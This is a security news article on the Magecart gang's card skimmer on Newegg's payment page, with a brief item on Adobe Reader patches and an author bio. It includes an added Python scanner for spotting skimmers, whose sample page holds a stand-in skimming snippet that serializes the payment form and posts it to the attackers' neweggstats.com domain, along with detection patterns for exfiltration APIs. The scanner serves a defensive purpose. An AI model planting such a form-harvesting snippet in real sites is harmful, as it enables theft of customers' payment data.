Online Retailer Newegg Hit by Magecart Card Skimming Gang

The same attackers believed to be responsible for the recent breach of British Airways customer payment data have injected card skimming code into the site of U.S. online retailer Newegg.com.

The code was identified by researchers from security firms Volexity and RiskIQ in a joint investigation and was removed from the site Sept. 18, when the two companies privately shared their findings with the retailer.

“Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site,” Newegg announced on Twitter. “We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted.”

According to Volexity and RiskIQ, the malicious snippet of code is very similar to the one found on BA’s website but has been specifically customized for Newegg’s platform. In fact, evidence suggests that Newegg was compromised before BA, the code appearing on the retailer’s website Aug. 14.

“The skimmer was put on the payment processing page itself, not in a script, so it would not show unless the payment page was hit,” the RiskIQ researchers said in a report.

The payment processing page is the place where customers enter their payment card details after they go through the previous steps of adding products in their carts and entering their delivery addresses for validation.

As in the BA case, the malicious skimming code collected all information entered into the payment form, serialized it and sent it to a domain called neweggstats.com that the attackers had registered Aug. 13. Also as in the BA attack, the malicious code was triggered for both desktop and mobile users.

The attackers used a valid TLS certificate on their domain so the data could be siphoned off over HTTPS, most likely to avoid triggering mixed-content warnings on Newegg’s own website.
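The behaviour described above (a script on the payment page that serializes form input and posts it to a domain outside the retailer's own infrastructure) is something a site owner can audit for. The following is an added example, not code from the article or from Volexity or RiskIQ: a small heuristic scanner that pulls the inline and external scripts out of a checkout page's HTML and flags any that reference hosts outside an allowlist, escalating when the same script also touches form-harvesting and network-send APIs or names the neweggstats.com domain reported in the investigation. The allowlist hosts (`www.shop.example`, `payments.shop.example`) and the sample page are constructed for illustration.

```python
"""Heuristic audit of a checkout page for inline card-skimmer indicators (added example)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the checkout page is legitimately allowed to talk to (assumed; the defender maintains this)
ALLOWED_HOSTS = {"www.shop.example", "payments.shop.example"}
# Exfiltration domain named in the Volexity/RiskIQ reports on the Newegg compromise
KNOWN_BAD_HOSTS = {"neweggstats.com"}

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
# APIs commonly used to read form input in bulk
HARVEST_RE = re.compile(r"(serialize\(|new FormData\(|\.value\b|querySelectorAll\()")
# APIs commonly used to send data off the page
EXFIL_RE = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new Image)\b")


class _ScriptCollector(HTMLParser):
    """Collects inline <script> bodies and external <script src> URLs."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self.external = []
        self._buf = None  # accumulates the body of the current inline script

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def audit_checkout_page(html, allowed_hosts=ALLOWED_HOSTS):
    """Return a list of (finding, script_ref, hosts) tuples for the given page HTML."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, body in enumerate(parser.inline):
        hosts = {h.lower() for h in URL_RE.findall(body)}
        foreign = {h for h in hosts if h not in allowed_hosts}
        if foreign & KNOWN_BAD_HOSTS:
            findings.append(("known_bad_domain", idx, sorted(foreign & KNOWN_BAD_HOSTS)))
        elif foreign and HARVEST_RE.search(body) and EXFIL_RE.search(body):
            # Unlisted host plus form harvesting plus a send primitive: the skimmer pattern
            findings.append(("possible_skimmer", idx, sorted(foreign)))
        elif foreign:
            findings.append(("unlisted_host", idx, sorted(foreign)))
    for src in parser.external:
        host = urlparse(src).hostname
        if host and host.lower() not in allowed_hosts:
            findings.append(("unlisted_script_src", src, [host.lower()]))
    return findings


# Constructed sample page: one benign inline script, one inline script modelled on the
# reported indicator (this is a label-only stand-in, not the real skimmer code).
SAMPLE_PAGE = """<html><body>
<form id="payment"><input name="cc"><input name="cvv"></form>
<script src="https://www.shop.example/js/checkout.js"></script>
<script>
  // benign ping to an allowed host
  fetch("https://payments.shop.example/ping");
</script>
<script>
  var payload = serialize(document.forms["payment"]);
  fetch("https://neweggstats.com/collect", {method: "POST", body: payload});
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_PAGE):
        print(finding)
```

Run it against the HTML as the browser actually receives it for the payment step: the RiskIQ report notes the skimmer sat in the payment page itself rather than in a separate script, so scanning only static JavaScript assets would miss it. The valid TLS certificate on the attackers' domain defeats mixed-content warnings but does nothing against a Content-Security-Policy whose `connect-src` and `form-action` directives are restricted to the same allowlist, which is the complementary control to pair with this kind of audit.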

Newegg and BA are just the latest in a long string of companies that have fallen victim to this hacker group, which is known in the security industry as Magecart. Other high-profile companies hit by the gang in recent months include Ticketmaster UK, Feedify and Filipino broadcaster ABS-CBN.

“Magecart attacks are surging—RiskIQ’s automatic detections of instances of Magecart breaches pings us almost hourly,” RiskIQ said. “Meanwhile, we’re seeing attackers evolve and improve over time, setting their sights on breaches of large brands. While some Magecart groups still target smaller shops, the subgroup responsible for the attacks against Newegg and British Airways is particularly audacious, performing cunning, highly targeted attacks with skimmers that seamlessly integrate into their targets’ websites.”

Newegg has not yet confirmed that payment card details were compromised in this attack, but given where the code was planted, what it was designed to do and the group’s previous success on BA’s website—380,000 compromised transactions—it’s likely that the impact will be similar.

Magecart is not the only group using JavaScript-based card skimming code. A researcher recently reported that another group, dubbed MagentoCore, managed to compromise more than 7,000 Magento-based online shops in this manner, some belonging to multi-million dollar brands.

“While Magecart may be a major threat which eCommerce companies need to protect against, the larger issue is the increasing use of JavaScript-based Data Theft Frameworks,” Volexity warned in its report. “MageCart, as well as other criminal tools such as JS Sniffer, show how a few simple lines of JavaScript on a compromised eCommerce site can lead to a devastating amount of information being stolen.”

Adobe Patches Critical Vulnerabilities in Reader and Acrobat

Adobe Systems has released new security updates for its Reader and Acrobat products, fixing seven vulnerabilities that are rated critical and important.

Only one flaw, tracked as CVE-2018-12848, is rated critical and was reported by Omri Herscovici, a vulnerability researcher with Check Point Software Technologies. The vulnerability is an out-of-bounds write that can lead to arbitrary code execution.

The other six flaws are out-of-bounds reads that can lead to information disclosure. They are rated important because they can potentially be chained with other vulnerabilities to enable exploits.

Adobe advises users to upgrade to Acrobat and Reader DC 2018.011.20063 if they are on the “continuous” track, or to Acrobat and Reader DC Classic 2017 2017.011.30102 or Acrobat and Reader DC Classic 2015 2015.006.30452 on the classic tracks.

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42